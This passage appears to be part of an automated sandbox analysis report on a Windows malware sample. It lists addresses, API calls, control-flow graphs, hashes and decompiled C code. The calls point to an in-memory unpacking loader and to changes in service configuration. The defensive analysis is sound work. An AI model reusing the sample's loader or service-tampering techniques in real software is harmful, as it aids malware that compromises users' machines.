                                                                      0x004023dd
                                                                      0x004023ec
                                                                      0x004023ef
                                                                      0x004023fe
                                                                      0x00402401
                                                                      0x00402403
                                                                      0x00402411
                                                                      0x00402417
                                                                      0x00402424
                                                                      0x00402426
                                                                      0x0040242a
                                                                      0x0040242c
                                                                      0x00402434
                                                                      0x00402434
                                                                      0x0040243a
                                                                      0x0040243f
                                                                      0x00402443
                                                                      0x00402445
                                                                      0x0040244d
                                                                      0x0040244d
                                                                      0x00402445
                                                                      0x00402251
                                                                      0x0040223d
                                                                      0x0040244f
                                                                      0x0040245d
                                                                      0x0040245f
                                                                      0x00402461
                                                                      0x00402462
                                                                      0x00402467
                                                                      0x00402467
                                                                      0x0040245f
                                                                      0x004021ca
                                                                      0x0040246a
                                                                      0x0040246e
                                                                      0x00402470
                                                                      0x00402478
                                                                      0x00402478
                                                                      0x0040247a
                                                                      0x0040247e
                                                                      0x00402480
                                                                      0x00402488
                                                                      0x00402488
                                                                      0x00402480
                                                                      0x00000000
                                                                      0x00401c55
                                                                      0x00401c62
                                                                      0x00401c67
                                                                      0x00401c6a
                                                                      0x00401c6c
                                                                      0x00401c73
                                                                      0x00401c73
                                                                      0x00401c77
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401c7b
                                                                      0x00401c8f
                                                                      0x00401c8f
                                                                      0x00401c7d
                                                                      0x00401c7d
                                                                      0x00401c83
                                                                      0x00000000
                                                                      0x00401c85
                                                                      0x00401c85
                                                                      0x00401c88
                                                                      0x00401c8d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401c8d
                                                                      0x00401c83
                                                                      0x00401c98
                                                                      0x00401c9a
                                                                      0x00401cbd
                                                                      0x00401cc2
                                                                      0x00401cc5
                                                                      0x00401cc7
                                                                      0x00401cd0
                                                                      0x00401cd0
                                                                      0x00401cd2
                                                                      0x00401cd4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401cd6
                                                                      0x00401cd8
                                                                      0x00401cec
                                                                      0x00401cec
                                                                      0x00401cda
                                                                      0x00401cda
                                                                      0x00401cdd
                                                                      0x00401ce0
                                                                      0x00000000
                                                                      0x00401ce2
                                                                      0x00401ce2
                                                                      0x00401ce5
                                                                      0x00401ce8
                                                                      0x00401cea
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401cea
                                                                      0x00401ce0
                                                                      0x00401cf5
                                                                      0x00401cf5
                                                                      0x00401cf7
                                                                      0x00000000
                                                                      0x00401cf9
                                                                      0x00401d02
                                                                      0x00401d07
                                                                      0x00401d09
                                                                      0x00401d10
                                                                      0x00401d1d
                                                                      0x00401d22
                                                                      0x00401d25
                                                                      0x00401d27
                                                                      0x00401d30
                                                                      0x00401d30
                                                                      0x00401d32
                                                                      0x00401d34
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401d36
                                                                      0x00401d38
                                                                      0x00401d4c
                                                                      0x00401d4c
                                                                      0x00401d3a
                                                                      0x00401d3a
                                                                      0x00401d3d
                                                                      0x00401d40
                                                                      0x00000000
                                                                      0x00401d42
                                                                      0x00401d42
                                                                      0x00401d45
                                                                      0x00401d48
                                                                      0x00401d4a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401d4a
                                                                      0x00401d40
                                                                      0x00401d55
                                                                      0x00401d55
                                                                      0x00401d57
                                                                      0x00000000
                                                                      0x00401d5d
                                                                      0x00401d6a
                                                                      0x00401d6f
                                                                      0x00401d72
                                                                      0x00401d74
                                                                      0x00401d80
                                                                      0x00401d80
                                                                      0x00401d82
                                                                      0x00401d84
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401d86
                                                                      0x00401d88
                                                                      0x00401d9c
                                                                      0x00401d9c
                                                                      0x00401d8a
                                                                      0x00401d8a
                                                                      0x00401d8d
                                                                      0x00401d90
                                                                      0x00000000
                                                                      0x00401d92
                                                                      0x00401d92
                                                                      0x00401d95
                                                                      0x00401d98
                                                                      0x00401d9a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401d9a
                                                                      0x00401d90
                                                                      0x00401da5
                                                                      0x00401da5
                                                                      0x00401da7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401da7
                                                                      0x00401da0
                                                                      0x00401da2
                                                                      0x00000000
                                                                      0x00401da2
                                                                      0x00000000
                                                                      0x00401d57
                                                                      0x00401d50
                                                                      0x00401d52
                                                                      0x00000000
                                                                      0x00401dad
                                                                      0x00401db6
                                                                      0x00401dbb
                                                                      0x00401dbb
                                                                      0x00401d10
                                                                      0x00000000
                                                                      0x00401d09
                                                                      0x00000000
                                                                      0x00401cf7
                                                                      0x00401cf0
                                                                      0x00401cf2
                                                                      0x00000000
                                                                      0x00401c9c
                                                                      0x00401c9c
                                                                      0x00401c9d
                                                                      0x00401caf
                                                                      0x00401caf
                                                                      0x00000000
                                                                      0x00401c9a
                                                                      0x00401c93
                                                                      0x00401c95
                                                                      0x00000000
                                                                      0x00401c95
                                                                      0x00401c4f
                                                                      0x00000000

                                                                      APIs
                                                                      • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                      • _getenv.LIBCMT ref: 00401ABA
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                      • Module32First.KERNEL32 ref: 00401C48
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                                                                      • Module32Next.KERNEL32 ref: 00401D02
                                                                      • Module32Next.KERNEL32 ref: 00401DB6
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                      • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                      • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                      • _malloc.LIBCMT ref: 00401EBA
                                                                      • _memset.LIBCMT ref: 00401EDD
                                                                      • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$PPKs$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                      • API String ID: 1430744539-892703413
                                                                      • Opcode ID: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                      • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                      • Opcode Fuzzy Hash: 9b8e818dc389e7faa11c559f92d128544e607fef32914ff1a283466d1b654c82
                                                                      • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 330 5b092b-5b0970 GetPEB 331 5b0972-5b0978 330->331 332 5b097a-5b098a call 5b0d35 331->332 333 5b098c-5b098e 331->333 332->333 338 5b0992-5b0994 332->338 333->331 335 5b0990 333->335 337 5b0996-5b0998 335->337 339 5b0a3b-5b0a3e 337->339 338->337 340 5b099d-5b09d3 338->340 341 5b09dc-5b09ee call 5b0d0c 340->341 344 5b09f0-5b0a3a 341->344 345 5b09d5-5b09d8 341->345 344->339 345->341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .$GetProcAddress.$l
                                                                      • API String ID: 0-2784972518
                                                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                      • Instruction ID: c7459638c87ba179e0e09c491d186f62b7a5d7d100fc19adb48b8d00ba977644
                                                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                      • Instruction Fuzzy Hash: 9F3148B6900609DFDB10CF99C884AEEBBF9FF48324F24514AD841A7291D771FA45CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 353 239a1a8-239a232 355 239a26b-239a28d 353->355 356 239a234-239a23e 353->356 363 239a2c9-239a2ea 355->363 364 239a28f-239a29c 355->364 356->355 357 239a240-239a242 356->357 358 239a265-239a268 357->358 359 239a244-239a24e 357->359 358->355 361 239a250 359->361 362 239a252-239a261 359->362 361->362 362->362 366 239a263 362->366 372 239a2ec-239a2f6 363->372 373 239a323-239a345 363->373 364->363 365 239a29e-239a2a0 364->365 367 239a2c3-239a2c6 365->367 368 239a2a2-239a2ac 365->368 366->358 367->363 370 239a2ae 368->370 371 239a2b0-239a2bf 368->371 370->371 371->371 374 239a2c1 371->374 372->373 375 239a2f8-239a2fa 372->375 379 239a381-239a3a2 373->379 380 239a347-239a354 373->380 374->367 377 239a31d-239a320 375->377 378 239a2fc-239a306 375->378 377->373 381 239a308 378->381 382 239a30a-239a319 378->382 390 239a3db-239a3fd 379->390 391 239a3a4-239a3ae 379->391 380->379 383 239a356-239a358 380->383 381->382 382->382 384 239a31b 382->384 385 239a37b-239a37e 383->385 386 239a35a-239a364 383->386 384->377 385->379 388 239a368-239a377 386->388 389 239a366 386->389 388->388 392 239a379 388->392 389->388 399 239a439-239a4b0 ChangeServiceConfigA 390->399 400 239a3ff-239a40c 390->400 391->390 393 239a3b0-239a3b2 391->393 392->385 395 239a3d5-239a3d8 393->395 396 239a3b4-239a3be 393->396 395->390 397 239a3c0 396->397 398 239a3c2-239a3d1 396->398 397->398 398->398 401 239a3d3 398->401 406 239a4b9-239a4f8 399->406 407 239a4b2-239a4b8 399->407 400->399 402 239a40e-239a410 400->402 401->395 404 239a433-239a436 402->404 405 239a412-239a41c 402->405 404->399 408 239a41e 405->408 409 239a420-239a42f 405->409 413 239a508-239a50c 406->413 414 239a4fa-239a4fe 406->414 407->406 408->409 409->409 411 239a431 409->411 411->404 416 239a51c-239a520 413->416 417 239a50e-239a512 413->417 414->413 415 239a500 414->415 415->413 419 239a530-239a534 416->419 420 239a522-239a526 416->420 417->416 418 239a514 417->418 418->416 421 239a544-239a548 419->421 422 239a536-239a53a 419->422 420->419 423 239a528 420->423 425 239a558-239a55c 421->425 426 239a54a-239a54e 421->426 422->421 424 239a53c 422->424 423->419 424->421 428 239a56c 425->428 429 239a55e-239a562 425->429 426->425 427 239a550 426->427 427->425 429->428 430 239a564 429->430 430->428
                                                                      APIs
                                                                      • ChangeServiceConfigA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?), ref: 0239A4A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: ChangeConfigService
                                                                      • String ID:
                                                                      • API String ID: 3849694230-0
                                                                      • Opcode ID: ec81c34a96aeb302b7a0b66f819a702b457f5260884df7dc428aa9e5c1e65384
                                                                      • Instruction ID: d9489655544dd98ca6f6ac78981c9ffeb7f80f8e7916cb1b79ca834205d702bd
                                                                      • Opcode Fuzzy Hash: ec81c34a96aeb302b7a0b66f819a702b457f5260884df7dc428aa9e5c1e65384
                                                                      • Instruction Fuzzy Hash: 2AC14A71E106198FDF10CFA8C9857AEBBF2BF46314F148669E895E7284DB749881CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 431 23996a8-239970f 433 239977e-2399782 431->433 434 2399711-2399736 431->434 435 2399784-23997c2 433->435 436 23997c6-2399804 GetUserNameA 433->436 440 2399738-239973a 434->440 441 2399766-239976b 434->441 435->436 438 239980d-2399823 436->438 439 2399806-239980c 436->439 442 2399839-2399860 438->442 443 2399825-2399831 438->443 439->438 445 239975c-2399764 440->445 446 239973c-2399746 440->446 454 239976d-2399779 441->454 449 2399870 442->449 450 2399862-2399866 442->450 443->442 445->454 452 2399748 446->452 453 239974a-2399758 446->453 450->449 457 2399868 450->457 452->453 453->453 458 239975a 453->458 454->433 457->449 458->445
                                                                      APIs
                                                                      • GetUserNameA.ADVAPI32(00000000), ref: 023997F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.367394519.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2390000_amMl.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID:
                                                                      • API String ID: 2645101109-0
                                                                      • Opcode ID: e695b405e90c046c24e3e58f2d2d0688e90649715e9aa3fa2751e77d430a487d
                                                                      • Instruction ID: 2c0fbe14fbcd8d4d1818b44e0b46ce6d8d2838a3b13ae0ef4c23b529608eccbf
                                                                      • Opcode Fuzzy Hash: e695b405e90c046c24e3e58f2d2d0688e90649715e9aa3fa2751e77d430a487d
                                                                      • Instruction Fuzzy Hash: E9512374D002088FDB18CFA9C984B9EBBF6AF49304F24C02DE816AB295DB759945CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 156 5b003c-5b0047 157 5b0049 156->157 158 5b004c-5b0263 call 5b0a3f call 5b0e0f call 5b0d90 VirtualAlloc 156->158 157->158 173 5b028b-5b0292 158->173 174 5b0265-5b0289 call 5b0a69 158->174 176 5b02a1-5b02b0 173->176 177 5b02ce-5b03c2 VirtualProtect call 5b0cce call 5b0ce7 174->177 176->177 178 5b02b2-5b02cc 176->178 185 5b03d1-5b03e0 177->185 178->176 186 5b0439-5b04b8 VirtualFree 185->186 187 5b03e2-5b0437 call 5b0ce7 185->187 189 5b04be-5b04cd 186->189 190 5b05f4-5b05fe 186->190 187->185 194 5b04d3-5b04dd 189->194 191 5b077f-5b0789 190->191 192 5b0604-5b060d 190->192 198 5b078b-5b07a3 191->198 199 5b07a6-5b07b0 191->199 192->191 195 5b0613-5b0637 192->195 194->190 197 5b04e3-5b0505 194->197 202 5b063e-5b0648 195->202 206 5b0517-5b0520 197->206 207 5b0507-5b0515 197->207 198->199 200 5b086e-5b08be LoadLibraryA 199->200 201 5b07b6-5b07cb 199->201 211 5b08c7-5b08f9 200->211 204 5b07d2-5b07d5 201->204 202->191 205 5b064e-5b065a 202->205 208 5b07d7-5b07e0 204->208 209 5b0824-5b0833 204->209 205->191 210 5b0660-5b066a 205->210 214 5b0526-5b0547 206->214 207->214 215 5b07e2 208->215 216 5b07e4-5b0822 208->216 218 5b0839-5b083c 209->218 217 5b067a-5b0689 210->217 212 5b08fb-5b0901 211->212 213 5b0902-5b091d 211->213 212->213 219 5b054d-5b0550 214->219 215->209 216->204 220 5b068f-5b06b2 217->220 221 5b0750-5b077a 217->221 218->200 222 5b083e-5b0847 218->222 224 5b05e0-5b05ef 219->224 225 5b0556-5b056b 219->225 226 5b06ef-5b06fc 220->226 227 5b06b4-5b06ed 220->227 221->202 228 5b084b-5b086c 222->228 229 5b0849 222->229 224->194 230 5b056f-5b057a 225->230 231 5b056d 225->231 232 5b074b 226->232 233 5b06fe-5b0748 226->233 227->226 228->218 229->200 234 5b059b-5b05bb 230->234 235 5b057c-5b0599 230->235 231->224 232->217 233->232 240 5b05bd-5b05db 234->240 235->240 240->219
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005B024D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: cess$kernel32.dll
                                                                      • API String ID: 4275171209-1230238691
                                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction ID: 7551dfa21bb43cba0658288d1fd6cf974fef82f8ba6c86bf0450c771147d3be8
                                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                      • Instruction Fuzzy Hash: 4F526874A00229DFDB64CF58C985BADBBB1BF09304F1480D9E94DAB291DB30AE85DF14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 241 40af66-40af6e 242 40af7d-40af88 call 40b84d 241->242 245 40af70-40af7b call 40d2e3 242->245 246 40af8a-40af8b 242->246 245->242 249 40af8c-40af98 245->249 250 40afb3-40afca call 40af49 call 40cd39 249->250 251 40af9a-40afb2 call 40aefc call 40d2bd 249->251 251->250
                                                                      C-Code - Quality: 63%
                                                                      			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                      				signed int _v4;
                                                                      				signed int _v16;
                                                                      				signed int _v40;
                                                                      				void* _t14;
                                                                      				signed int _t15;
                                                                      				intOrPtr* _t21;
                                                                      				signed int _t24;
                                                                      				void* _t28;
                                                                      				void* _t39;
                                                                      				void* _t40;
                                                                      				signed int _t42;
                                                                      				void* _t45;
                                                                      				void* _t47;
                                                                      				void* _t51;
                                                                      
                                                                      				_t40 = __edi;
                                                                      				_t28 = __ebx;
                                                                      				_t45 = _t51;
                                                                      				while(1) {
                                                                      					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                                      					if(_t14 != 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t15 = E0040D2E3(_a4);
                                                                      					__eflags = _t15;
                                                                      					if(_t15 == 0) {
                                                                      						__eflags =  *0x423490 & 0x00000001;
                                                                      						if(( *0x423490 & 0x00000001) == 0) {
                                                                      							 *0x423490 =  *0x423490 | 0x00000001;
                                                                      							__eflags =  *0x423490;
                                                                      							E0040AEFC(0x423484);
                                                                      							E0040D2BD( *0x423490, 0x41a704);
                                                                      						}
                                                                      						E0040AF49( &_v16, 0x423484);
                                                                      						E0040CD39( &_v16, 0x420fa4);
                                                                      						asm("int3");
                                                                      						_t47 = _t45;
                                                                      						_push(_t47);
                                                                      						_push(0xc);
                                                                      						_push(0x420ff8);
                                                                      						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                                      						_t42 = _v4;
                                                                      						__eflags = _t42;
                                                                      						if(_t42 != 0) {
                                                                      							__eflags =  *0x4250b0 - 3;
                                                                      							if( *0x4250b0 != 3) {
                                                                      								_push(_t42);
                                                                      								goto L16;
                                                                      							} else {
                                                                      								E0040D6E0(_t28, 4);
                                                                      								_v16 = _v16 & 0x00000000;
                                                                      								_t24 = E0040D713(_t42);
                                                                      								_v40 = _t24;
                                                                      								__eflags = _t24;
                                                                      								if(_t24 != 0) {
                                                                      									_push(_t42);
                                                                      									_push(_t24);
                                                                      									E0040D743();
                                                                      								}
                                                                      								_v16 = 0xfffffffe;
                                                                      								_t19 = E0040B70B();
                                                                      								__eflags = _v40;
                                                                      								if(_v40 == 0) {
                                                                      									_push(_v4);
                                                                      									L16:
                                                                      									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                                      									if(__eflags == 0) {
                                                                      										_t21 = E0040BFC1(__eflags);
                                                                      										 *_t21 = E0040BF7F(GetLastError());
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						return E0040E21D(_t19);
                                                                      					} else {
                                                                      						continue;
                                                                      					}
                                                                      					L19:
                                                                      				}
                                                                      				return _t14;
                                                                      				goto L19;
                                                                      			}

















                                                                      0x0040af66
                                                                      0x0040af66
                                                                      0x0040af69
                                                                      0x0040af7d
                                                                      0x0040af80
                                                                      0x0040af88
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040af73
                                                                      0x0040af79
                                                                      0x0040af7b
                                                                      0x0040af8c
                                                                      0x0040af98
                                                                      0x0040af9a
                                                                      0x0040af9a
                                                                      0x0040afa3
                                                                      0x0040afad
                                                                      0x0040afb2
                                                                      0x0040afb7
                                                                      0x0040afc5
                                                                      0x0040afca
                                                                      0x0040afd0
                                                                      0x0040aec2
                                                                      0x0040b6b5
                                                                      0x0040b6b7
                                                                      0x0040b6bc
                                                                      0x0040b6c1
                                                                      0x0040b6c4
                                                                      0x0040b6c6
                                                                      0x0040b6c8
                                                                      0x0040b6cf
                                                                      0x0040b714
                                                                      0x00000000
                                                                      0x0040b6d1
                                                                      0x0040b6d3
                                                                      0x0040b6d9
                                                                      0x0040b6de
                                                                      0x0040b6e4
                                                                      0x0040b6e7
                                                                      0x0040b6e9
                                                                      0x0040b6eb
                                                                      0x0040b6ec
                                                                      0x0040b6ed
                                                                      0x0040b6f3
                                                                      0x0040b6f4
                                                                      0x0040b6fb
                                                                      0x0040b700
                                                                      0x0040b704
                                                                      0x0040b706
                                                                      0x0040b715
                                                                      0x0040b723
                                                                      0x0040b725
                                                                      0x0040b727
                                                                      0x0040b73a
                                                                      0x0040b73c
                                                                      0x0040b725
                                                                      0x0040b704
                                                                      0x0040b6cf
                                                                      0x0040b742
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040af7b
                                                                      0x0040af8b
                                                                      0x00000000

                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 0040AF80
                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                        • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                      • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1411284514-0
                                                                      • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                      • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                      • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                                      • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 260 405a20-405a2e 261 405a34-405a38 260->261 262 405c5c-405c63 260->262 261->262 263 405a3e-405a47 261->263 264 405c57-405c5b 263->264 265 405a4d-405a4f 263->265 265->264 266 405a55-405a58 265->266 267 405a5a-405a5e 266->267 268 405a5f-405a6f 266->268 269 405a71-405a74 268->269 270 405a9f-405aa3 268->270 269->270 273 405a76-405a95 269->273 271 405aa9 270->271 272 405c1c-405c37 call 403080 270->272 274 405ab0-405ab4 271->274 284 405c39-405c3f 272->284 285 405c4e-405c56 272->285 273->270 276 405a97-405a9e 273->276 277 405bb3-405bbb 274->277 278 405aba-405abe 274->278 282 405bbd 277->282 283 405bbf-405bc1 277->283 280 405ac0-405ac4 278->280 281 405b0f-405b38 call 4073a0 278->281 280->281 286 405ac6-405aed call 40bfc1 call 40bf62 280->286 299 405b3a-405b5d call 403080 call 4055e0 281->299 300 405b8e-405b92 281->300 282->283 289 405be0-405be5 283->289 290 405bc3-405bdd call 40b350 283->290 287 405c41-405c44 284->287 288 405c46-405c4d 284->288 313 405b0a-405b0d 286->313 314 405aef-405b04 call 40bc8e 286->314 287->285 287->288 295 405be7-405bf7 call 40bf62 289->295 296 405bfa-405c05 289->296 290->289 295->296 297 405c07 296->297 298 405c0e-405c14 296->298 297->298 317 405baa-405bb1 299->317 318 405b5f-405b71 call 4055e0 call 405000 299->318 300->272 304 405b98-405b9c 300->304 304->272 308 405b9e-405ba2 304->308 308->274 311 405ba8 308->311 311->272 313->281 314->313 321 405c15 314->321 317->272 318->272 325 405b77-405b78 call 4070f0 318->325 321->272 327 405b7d-405b8b call 403080 325->327 327->300
                                                                      C-Code - Quality: 98%
                                                                      			E00405A20(signed int __edx, intOrPtr* _a4, char* _a8, signed int _a12) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				char* _t78;
                                                                      				signed int _t82;
                                                                      				signed int _t84;
                                                                      				signed int _t85;
                                                                      				signed int _t86;
                                                                      				signed int _t87;
                                                                      				void* _t89;
                                                                      				signed int _t92;
                                                                      				signed int _t95;
                                                                      				signed int _t96;
                                                                      				signed int _t98;
                                                                      				signed int _t106;
                                                                      				char* _t110;
                                                                      				signed int _t115;
                                                                      				signed int _t116;
                                                                      				signed int _t124;
                                                                      				char* _t133;
                                                                      				signed int _t134;
                                                                      				intOrPtr* _t135;
                                                                      				signed int _t136;
                                                                      				signed int _t138;
                                                                      				signed int _t141;
                                                                      				void* _t144;
                                                                      
                                                                      				_t78 = _a8;
                                                                      				_t135 = _a4;
                                                                      				_t133 = _t78;
                                                                      				if(_t135 == 0 ||  *((char*)(_t135 + 0x5c)) != 0x72) {
                                                                      					return 0xfffffffe;
                                                                      				} else {
                                                                      					_t115 =  *(_t135 + 0x38);
                                                                      					_t124 = __edx | 0xffffffff;
                                                                      					if(_t115 == 0xfffffffd || _t115 == _t124) {
                                                                      						return _t124;
                                                                      					} else {
                                                                      						if(_t115 != 1) {
                                                                      							_t138 = _a12;
                                                                      							_t110 = _t78;
                                                                      							 *((intOrPtr*)(_t135 + 0xc)) = _t78;
                                                                      							 *(_t135 + 0x10) = _t138;
                                                                      							__eflags = _t138;
                                                                      							if(_t138 == 0) {
                                                                      								L10:
                                                                      								__eflags =  *(_t135 + 0x10);
                                                                      								if( *(_t135 + 0x10) == 0) {
                                                                      									L37:
                                                                      									_t82 = E00403080( *(_t135 + 0x4c), _t133,  *((intOrPtr*)(_t135 + 0xc)) - _t133);
                                                                      									_t116 =  *(_t135 + 0x10);
                                                                      									 *(_t135 + 0x4c) = _t82;
                                                                      									__eflags = _t138 - _t116;
                                                                      									if(_t138 != _t116) {
                                                                      										L41:
                                                                      										_t84 = _t138 - _t116;
                                                                      										__eflags = _t84;
                                                                      										return _t84;
                                                                      									} else {
                                                                      										_t136 =  *(_t135 + 0x38);
                                                                      										__eflags = _t136 - 0xfffffffd;
                                                                      										if(_t136 == 0xfffffffd) {
                                                                      											L40:
                                                                      											_t85 = _t82 | 0xffffffff;
                                                                      											__eflags = _t85;
                                                                      											return _t85;
                                                                      										} else {
                                                                      											__eflags = _t136 - 0xffffffff;
                                                                      											if(_t136 != 0xffffffff) {
                                                                      												goto L41;
                                                                      											} else {
                                                                      												goto L40;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								} else {
                                                                      									while(1) {
                                                                      										__eflags =  *(_t135 + 0x58);
                                                                      										if( *(_t135 + 0x58) != 0) {
                                                                      											break;
                                                                      										}
                                                                      										__eflags =  *(_t135 + 4);
                                                                      										if( *(_t135 + 4) != 0) {
                                                                      											L18:
